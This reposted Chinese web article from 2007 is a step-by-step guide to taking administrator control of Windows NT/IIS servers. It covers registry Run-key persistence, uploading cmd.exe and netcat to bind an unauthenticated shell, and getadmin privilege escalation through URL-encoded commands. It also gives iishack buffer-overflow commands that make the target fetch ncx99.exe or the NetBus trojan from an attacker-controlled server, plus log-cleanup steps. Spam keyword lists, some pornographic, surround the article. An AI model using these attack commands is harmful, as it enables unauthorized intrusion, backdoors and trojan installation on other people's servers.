国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

教你獲取WindowsNT的Admin權(quán)限的方法
2007-01-15   

一、通過(guò)修改注冊(cè)表

凡是具有登錄NT本機(jī)的用戶,例如IUSR_machine,都具有對(duì) HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 項(xiàng)的可讀可寫(xiě)權(quán)限,該用戶可以遠(yuǎn)程訪問(wèn)這個(gè)項(xiàng)。比如,他可以創(chuàng)建一個(gè)bat文件,文件內(nèi)容為:cmd.exe /c net localgroup administrators IUSR_machine /add,把該文件copy到winnt目錄下,然后在注冊(cè)表上述的項(xiàng)添加一個(gè)數(shù)值,指向這個(gè)文件。

那么,當(dāng)下次Admin登錄到該機(jī)器上時(shí),就會(huì)自動(dòng)把IUSR_machine添加到Administrators組。

另,注冊(cè)表鍵HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以這么做。

二、自建Telnet服務(wù)在NT上執(zhí)行指令

要求用戶有文件上傳權(quán)限,而且該目錄位于web目錄下,該目錄允許執(zhí)行,下面是具體步驟。

假設(shè)你的目錄是www.xxx.com/frankie,那么,把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe傳到這個(gè)目錄上去。

然后,在瀏覽器端輸入:

http://www.xxx.com/frankie/cmd.e ... 20-t%20-e%20cmd.exe

這時(shí)候,你的瀏覽器將停止不動(dòng),實(shí)際上,Server上的Telnet的服務(wù)已經(jīng)產(chǎn)生了。

這時(shí),用Telnet連接www.xxx.com的23端口。你發(fā)現(xiàn),不用密碼,不用登陸,對(duì)方C:\提示符已經(jīng)出現(xiàn)在你的眼前!更妙的是,這個(gè)Telnet server是一個(gè)一次性的服務(wù),當(dāng)客戶端一退出,該服務(wù)也將終止。

Netcat不同于一般的特洛伊木馬,它可以構(gòu)建任何的TCP連接服務(wù)。在瀏覽器端輸入上述的字符串,等價(jià)于在NT的Dos方式下輸入

nc -l -p 23 -t -e cmd.exe

這將把cmd.exe綁定到23端口上。

三、入侵NTserver典型途徑V2.0

1、如果你有NT/IIS服務(wù)器的任何一個(gè)帳號(hào),哪怕是guest帳號(hào),都可以獲得root。

2、用Netcat和iishack可以獲得root。

3、Iusr_計(jì)算機(jī)名這個(gè)帳號(hào)有ftp上傳,web執(zhí)行等權(quán)限。

4、在Web server上執(zhí)行程序是入侵NT的關(guān)鍵。

5、要在Web server上執(zhí)行程序就先要上傳文件到cgi-bin目錄或者scripts目錄等有執(zhí)行權(quán)限的目錄上去。

在本文中,目標(biāo)機(jī)器的名稱是ntsvr2,目標(biāo)機(jī)器的域名是www.xxx.com,目標(biāo)機(jī)器上有scripts和cgi-bin目錄,scripts目錄下有uploadn.asp等asp程序,可能有g(shù)uest帳號(hào),肯定有iusr_ntsvr2這個(gè)帳號(hào)。

第一個(gè)方法、用Iusr_ntsvr2后者Guest這兩個(gè)帳號(hào)

這里假設(shè)我們已經(jīng)破解了這個(gè)帳號(hào)的密碼,在瀏覽器輸入:

http://www.xxx.com/scripts/uploadn.asp

guest和iusr_ntsvr2這兩個(gè)帳號(hào)都可以進(jìn)這個(gè)asp頁(yè)面,在這里把文件getadmin和gasys.dll以及cmd.exe上傳到/scripts目錄。

然后輸入:

http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2

大約十多秒后屏幕顯示:

CGI Error

這時(shí)有90%的可能是:你已經(jīng)把IUSR_ntsvr2升級(jí)為Administrator,也就是任何訪問(wèn)該web站的人都是管理員。

下面可以Add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

這樣就創(chuàng)建了一個(gè)叫china用戶,密碼是news,然后:

http://www.xxx.com/scripts/getadmin.exe?china

第二個(gè)方法、用匿名Ftp

如果允許匿名帳號(hào)ftp登陸的設(shè)定,也給我們帶來(lái)了突破NT server的機(jī)會(huì)。我們用ftp登陸一個(gè)NT server,比如:www.xxx.com(示例名):

ftp www.xxx.com 
Connected to www.xxx.com 
220 ntsvr2 Microsoft FTP Service (Version 3.0).

Ntsvr2這個(gè)東西暴露了其N(xiāo)ETbios名,那么在IIS的背景下,必然會(huì)有一個(gè)IUSR_ntsvr2的用戶帳號(hào),屬于Domain user組,這個(gè)帳號(hào)我們以后要用來(lái)獲取Administrator的權(quán)限。

User (www.xxx.com:(none)):anonymous 
331 Anonymous access allowed, send identity (e-mail name) as password.

Password:輸入 guest@ 或者guest。

對(duì)于缺乏網(wǎng)絡(luò)安全知識(shí)的管理員來(lái)說(shuō),很多人沒(méi)有將guest帳號(hào)禁止,或者沒(méi)有設(shè)置密碼。那么guest帳號(hào)就是一個(gè)可用的正確的用戶帳號(hào),雖然只屬于Domain guest組。在這種情況下我們就可以進(jìn)NT server的ftp了。

進(jìn)去以后,看看目錄列表,試試 cd /scripts 或cgi-bin等關(guān)鍵目錄,如果運(yùn)氣好,改變目錄成功,這時(shí)你就有了80%的把握。

把Winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin,然后輸入:

http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2

大約十多秒后屏幕顯示:

CGI Error

這時(shí)有90%的可能是:你已經(jīng)把IUSR_ntsvr2升級(jí)為Administrator,也就是任何訪問(wèn)該web站的人都是管理員。

下面可以add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

這樣就創(chuàng)建了一個(gè)叫china用戶,密碼是news,然后:

http://www.xxx.com/cgi-bin/getadmin.exe?china

或者

http://www.xxx.com/scripts/tools/getadmin.exe?china

你再用China的帳號(hào)登陸,就可以有最大的權(quán)限了,也可以用上面的cmd.exe的方法直接修改 如果沒(méi)有cmd.exe,也可以自己傳一個(gè)上去到scripts/tools或者cgi-bin目錄。

第三個(gè)方法、用netcat和iishack

如果你熟悉使用Netcat這個(gè)工具,你就知道,netcat可以利用NT的弱點(diǎn)在其上綁定端口,下面用eEye的工具已經(jīng)介紹過(guò),如果你熟悉Netcat,成功的可能性會(huì)更大。

IIS的ISAPI的毛病(*.HTR) 我們?cè)賮?lái)看看eEye最近這兩天發(fā)現(xiàn)的一個(gè)關(guān)于NT/IIS的問(wèn)題和工具。在IIS的/Inetsrv目錄下,有個(gè)DLL文件叫ism.dll,這個(gè)模塊在web運(yùn)行的時(shí)候就被加載到較高的內(nèi)存地址,并且導(dǎo)致了零字節(jié)問(wèn)題到處出現(xiàn)IIShack.asm,利用這個(gè)毛病,eEye寫(xiě)了兩個(gè)程序:

iishack.exe 
ncx99.exe

為達(dá)目的你必須自己有一個(gè)web server,把ncx99.exe和netbus木馬傳到這個(gè)web server的目錄下,比如你的web server是:

www.mysvr.com? 而對(duì)方的IIS server是www.xxx.com

則:

iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字符!)

上述命令輸入后這時(shí)你應(yīng)該可以看到

------(IIS 4.0 remote buffer overflow exploit)----------------- 
(c) dark spyrit -- barns@eeye.com. 
http://www.eEye.com 
[usage: iishack ] 
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe 
do not include 'http://' before hosts! 
--------------------------------------------------------------- 
Data sent!

然后,再把Netbus等特洛伊木馬傳到對(duì)方機(jī)器上去:

iishack www.example.com 80 www.myserver.com/netbus.exe

ncx99.exe實(shí)際上是有名的Netcat的變種,它把對(duì)方server的cmd.exe綁定到Telnet服務(wù)。 ncx.exe 這是較早的版本,是把端口綁到80的,由于80端口跑web服務(wù),端口已經(jīng)被使用。所以可能不一定有效。然后,用Telnet到對(duì)方的99或80端口:

Telnet www.xxx.com 99

結(jié)果是這樣:

Microsoft(R) Windows NT(TM) 
(C) Copyright 1985-1996 Microsoft Corp. 

C:\>[You have full access to the system, happy browsing :)] 
C:\>[Add a scheduled task to restart inetinfo in X minutes] 
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] 
C:\>[Clean up any trace or logs we might have left behind.]

這樣,你就完全控制了其硬盤(pán)上的文件!注意,如果你type exit退出,對(duì)方server上的這個(gè)進(jìn)程也會(huì)退出。

補(bǔ)救方法:在IIS的www service屬性中將主目錄的應(yīng)用程序設(shè)置的*.htr的映射刪除。

其它:用Retina.exe得到NT域內(nèi)的帳號(hào)清單,逐個(gè)嘗試這些帳號(hào),如果有的密碼薄弱而被你猜出來(lái),就可以用上面的方法來(lái)獲取NT的Admin。

責(zé)任編輯 趙毅 zhaoyi#51cto.com TEL:(010)68476636-8001


熱詞搜索:

上一篇:像“偷竊者”一樣思考網(wǎng)站的安全策略
下一篇:執(zhí)行文件方式加密FLASH文件的解密方法

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产精品久久久久国产精品日日 | 日韩国产欧美在线观看| 一级日本不卡的影视| 天堂蜜桃91精品| 国模一区二区三区白浆| 91在线观看成人| 欧美一区二区视频网站| 中文字幕乱码亚洲精品一区| 日韩一区二区三区四区| 久久精品视频在线免费观看| 亚洲一区二区综合| 国产精品69久久久久水密桃| 欧美日韩激情一区二区三区| 欧美国产日韩在线观看| 亚洲h动漫在线| 成人激情动漫在线观看| 日韩一区二区三区四区五区六区| 国产精品入口麻豆九色| 日本人妖一区二区| 99精品视频一区| 欧美精品一区二区久久久| 一区二区久久久| 成人激情开心网| 国产精品久久久久久久久晋中| 精品一区二区免费视频| 日韩一区二区免费在线观看| 天堂va蜜桃一区二区三区 | 亚洲图片欧美综合| 色久综合一二码| 亚洲激情一二三区| 91官网在线免费观看| 亚洲一区视频在线观看视频| 色悠久久久久综合欧美99| 亚洲女同女同女同女同女同69| 欧美色综合网站| 国产精品国产馆在线真实露脸| 韩国女主播一区| 久久你懂得1024| 国产福利一区二区| 国产清纯在线一区二区www| 国产精品资源站在线| 久久九九久久九九| av资源网一区| 亚洲精品视频在线观看网站| 91丨九色丨蝌蚪富婆spa| 亚洲欧洲成人精品av97| 91国内精品野花午夜精品| 一区二区三区四区高清精品免费观看| 日本韩国精品一区二区在线观看| 亚洲国产日韩a在线播放性色| 欧美视频在线一区| 日本午夜精品视频在线观看| 日韩免费观看高清完整版 | 久久久久久久久久看片| 国产专区综合网| 国产精品私人自拍| 色88888久久久久久影院按摩| 亚洲成人在线免费| 国产日韩欧美a| 欧美制服丝袜第一页| 日日摸夜夜添夜夜添精品视频| 欧美精品一区二区三区蜜桃视频 | 在线亚洲精品福利网址导航| 午夜国产不卡在线观看视频| 精品欧美一区二区三区精品久久| 成人一区二区视频| 日韩经典一区二区| 国产精品网曝门| 欧美久久一二区| 成人午夜精品在线| 日韩精品电影在线| 国产精品美女久久久久aⅴ国产馆| 91国偷自产一区二区开放时间| 久久99精品国产麻豆婷婷洗澡| 亚洲精品大片www| 久久综合九色综合欧美就去吻 | 亚洲欧美偷拍另类a∨色屁股| 91精品国产91久久久久久最新毛片 | 国产色综合一区| 欧美日韩精品电影| 91视频在线观看免费| 久久97超碰色| 亚洲成人综合在线| 中文字幕一区三区| 久久综合色天天久久综合图片| 欧美系列亚洲系列| 一本大道综合伊人精品热热| 国产一区二区女| 日本欧洲一区二区| 亚洲一区二区欧美激情| 国产精品久久久久久久久免费桃花| 7777精品伊人久久久大香线蕉 | 性做久久久久久免费观看| 国产欧美视频在线观看| 日韩一级大片在线观看| 色婷婷一区二区| 大陆成人av片| 国产一区二区三区久久久| 日韩一区精品字幕| 亚洲成av人片观看| 一区二区三区四区高清精品免费观看 | 一区二区成人在线观看| 亚洲国产成人在线| 久久婷婷国产综合国色天香| 日韩区在线观看| 欧美麻豆精品久久久久久| 91国内精品野花午夜精品| 91在线小视频| 一本大道综合伊人精品热热 | 成人欧美一区二区三区小说| 国产欧美日韩一区二区三区在线观看| 日韩美一区二区三区| 欧美一级日韩一级| 欧美一区永久视频免费观看| 欧美日韩综合在线免费观看| 欧美日韩国产综合草草| 欧美日韩一本到| 欧美日韩1区2区| 欧美本精品男人aⅴ天堂| 日韩视频在线观看一区二区| 欧美成人国产一区二区| 欧美不卡一区二区三区| 久久香蕉国产线看观看99| 欧美激情一区二区在线| 国产精品久久久久影院老司| 自拍偷在线精品自拍偷无码专区| 17c精品麻豆一区二区免费| 亚洲影视在线播放| 日本aⅴ精品一区二区三区| 久久成人av少妇免费| 国产精品一区一区三区| www.亚洲激情.com| 欧美亚洲一区二区在线观看| 91精品国产综合久久香蕉麻豆| 日韩一级在线观看| 国产视频亚洲色图| 亚洲一区在线看| 久久精品国产一区二区| 国产福利精品一区| 色婷婷国产精品| 精品少妇一区二区三区在线视频| www国产精品av| 亚洲免费观看在线观看| 亚洲超丰满肉感bbw| 国产在线观看一区二区| 91在线国内视频| 欧美一区日韩一区| 欧美国产日韩精品免费观看| 亚洲一区二区三区四区五区黄| 久久av中文字幕片| 色噜噜狠狠成人网p站| 欧美一区二区三区不卡| 欧美激情一区在线| 婷婷中文字幕综合| aaa欧美色吧激情视频| 91精品国产综合久久福利| 国产精品午夜久久| 日本亚洲最大的色成网站www| 丰满少妇久久久久久久| 欧美日韩一区二区三区不卡| 久久久久一区二区三区四区| 亚洲va国产天堂va久久en| 国产精品456| 91超碰这里只有精品国产| 亚洲欧美综合色| 久久精品av麻豆的观看方式| 在线欧美日韩国产| 国产午夜久久久久| 免费观看成人鲁鲁鲁鲁鲁视频| 99精品视频在线观看| 欧美精品一区男女天堂| 偷窥少妇高潮呻吟av久久免费| av亚洲产国偷v产偷v自拍| 精品动漫一区二区三区在线观看 | 国产欧美日韩另类视频免费观看 | 国产98色在线|日韩| 91精品国产综合久久福利软件| 一区二区三区中文字幕精品精品 | 欧美日韩在线播放三区四区| 亚洲三级在线免费观看| 国产成人精品免费| 久久久精品国产免大香伊| 麻豆国产91在线播放| 欧美精品粉嫩高潮一区二区| 亚洲一区二区三区中文字幕| 99综合影院在线| 国产精品电影一区二区三区| 国产盗摄一区二区三区| 欧美精品一区二区在线观看| 美女国产一区二区三区| 91精品国产一区二区人妖| 一区二区三区欧美久久| 91视视频在线直接观看在线看网页在线看 | 狠狠色丁香婷婷综合| 欧美电影免费观看高清完整版在线| 五月婷婷激情综合网| 91精品国产综合久久久蜜臀粉嫩| 一区二区三区蜜桃| 欧美色图免费看| 亚洲成人免费在线|